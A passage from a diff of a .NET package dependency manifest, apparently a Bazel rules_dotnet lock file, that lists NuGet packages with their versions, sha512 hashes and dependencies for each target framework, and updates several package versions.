"netcoreapp2.1": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "8.0.0", "sha512": "sha512-vfR5BfUXXy3amp5aDoOTwOt9BJ8CtplaAnEKHbeTbmMW1SJMrSdviTVVRNqDB0eB9o1j/26WD1VA8JGFfr8t+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime", "id": "System.Runtime", "version": "4.3.1", "sha512": "sha512-Al69mPDfzdD+bKGK2HAfB+lNFOHFqnkqzNnUJmmvUe1/qEPK9M7EiTT4zuycKDPy7ev11xz8XVgJWKP0hm7NIA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime.CompilerServices.Unsafe", "id": "System.Runtime.CompilerServices.Unsafe", "version": "6.0.0", "sha512": "sha512-1AVzAb5OxJNvJLnOADtexNmWgattm2XVOT3TjQTN7Dd4SqoSwai1CsN2fth42uQldJSQdz/sAec0+TzxBFgisw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Runtime.Handles", "id": "System.Runtime.Handles", "version": "4.3.0", "sha512": "sha512-CluvHdVUv54BvLTOCCyybugreDNk/rR8unMPruzXDtxSjvrQOU3M4R831/lQf4YI8VYp668FGQa/01E+Rq8PEQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Cryptography.ProtectedData", "id": "System.Security.Cryptography.ProtectedData", "version": "7.0.0", "sha512": "sha512-a34SHiyaMcLRjw/1IGXokS2cH9j8XoOhs1jUYq3m+kQcnPp6fhmeuqe5U947WqojDsVMhWAsCE6rIg8grBv9BA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Permissions", "id": "System.Security.Permissions", "version": "7.0.0", "sha512": "sha512-XNVTmQ9JuCRwRXRTDoOHEzEt0wmQeRudH9lThP0l3OBja4P3jmRHq/0H0N9Ns1OD6gNmKpjLdOeHCQEXv4iVrA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": ["System.Windows.Extensions"], "net7.0": ["System.Windows.Extensions"], "net8.0": ["System.Windows.Extensions"], "net9.0": ["System.Windows.Extensions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Security.Cryptography.ProtectedData", "id": "System.Security.Cryptography.ProtectedData", "version": "8.0.0", "sha512": "sha512-hvcXZ/IR+KXxY9lC9S2izw5/fGYoODJR2r9kQSvs5v/HUAnBRuYYZPJrHzaT0CeDRJzIm8BHJb1ZrwHQ59j3uQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory"], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Memory"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory"], "netcoreapp2.1": ["System.Memory"], "netcoreapp2.2": ["System.Memory"], "netcoreapp3.0": ["System.Memory"], "netcoreapp3.1": ["System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory"], "netstandard2.1": ["System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Security.Principal", "id": "System.Security.Principal", "version": "4.3.0", "sha512": "sha512-24oe0NGJY32e+DFHVQzl2okM9uwYmn0Aa6nehqtVZ55/Al4Yva7S3BN934Kn5qATH7TVTUJkgxhisdfF7mKDfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], "netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": ["System.Runtime"], "netstandard1.1": ["System.Runtime"], "netstandard1.2": ["System.Runtime"], "netstandard1.3": ["System.Runtime"], "netstandard1.4": ["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Security.Principal.Windows", "id": "System.Security.Principal.Windows", "version": "5.0.0", "sha512": "sha512-RKkgqq8ishctQTGbtXqyuOGkUx1fAhkqb1OoHYdRJRlbYLoLWkSkWYHRN/17DzplsSlZtf2Xr8BXjNhO8nRnzQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netcoreapp1.1": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard1.4": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard1.5": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard1.6": ["Microsoft.Win32.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Security.Principal", "System.Text.Encoding"], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Text.Encoding", "id": "System.Text.Encoding", "version": "4.3.0", "sha512": "sha512-b/f+7HMTpxIfeV7H03bkuHKMFylCGfr9/U6gePnfFFW0aF8LOWLDgQCY6V1oWUqDksC3mdNuyChM1vy9TP4sZw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Channels", "id": "System.Threading.Channels", "version": "8.0.0", "sha512": "sha512-M1s365f1lOc6s2585/ATW+KRRFFnaI6JvSSdE14n9ZKgvWnZHoJGoccqV41XvtRDrHMCMRNlwWFgt9yXTu3xQQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Text.Encoding.CodePages", "id": "System.Text.Encoding.CodePages", "version": "7.0.0", "sha512": "sha512-SFq/rrH52sMHJJsthDdafWPEuxdRCRB7pZ46trR2xSpi1nfKPAbw6amZr9W/LyHTlqS01TRWO7najRuO1vxFig==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Channels", "id": "System.Threading.Channels", "version": "7.0.0", "sha512": "sha512-XXmpdJbyVCagWg3bGfUGNTxKp4EK/3C4Bt8pXhKVYZKwHPjeHPOg0u2wdqHFsojU4u4i9KByAJTyzqLCMqwpUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.Tasks", "id": "System.Threading.Tasks", "version": "4.3.0", "sha512": "sha512-fUiP+CyyCjs872OA8trl6p97qma/da1xGq3h4zAbJZk8zyaU4zyEfqW5vbkP80xG/Nimun1vlWBboMEk7XxdEw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Tasks.Dataflow", "id": "System.Threading.Tasks.Dataflow", "version": "7.0.0", "sha512": "sha512-nB6cUBEEimO35tPK+KmhUF8jxxisO1E+8KU3eDIA9/o156qulMs8YeozOTcVRYHZWvgn1YCDI/ZR2ga9ErXIfg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Tasks.Extensions", "id": "System.Threading.Tasks.Extensions", "version": "4.5.4", "sha512": "sha512-aAUghud9PHGYc3o9oWPWd0C3xE+TJQw5ZZs78htlR6mr9ky/QEgfXHjyQ2GvOq9H1S0YizcVVKCSin92ZcH8FA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.2": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.3": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.4": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.5": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.6": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.ThreadPool", "id": "System.Threading.ThreadPool", "version": "4.3.0", "sha512": "sha512-RQpA+UpI6Tlpeedk5JStYk2DM/M3i5HqabI/yDbfj1xDu9bIz9kdoquVpHbh/wQjOJaOCbcgRH8iQcAUv8dRWQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime", "System.Runtime.Handles"], "net6.0": ["System.Runtime", "System.Runtime.Handles"], "net7.0": ["System.Runtime", "System.Runtime.Handles"], "net8.0": ["System.Runtime", "System.Runtime.Handles"], "net9.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.1": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.2": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["System.Runtime", "System.Runtime.Handles"], 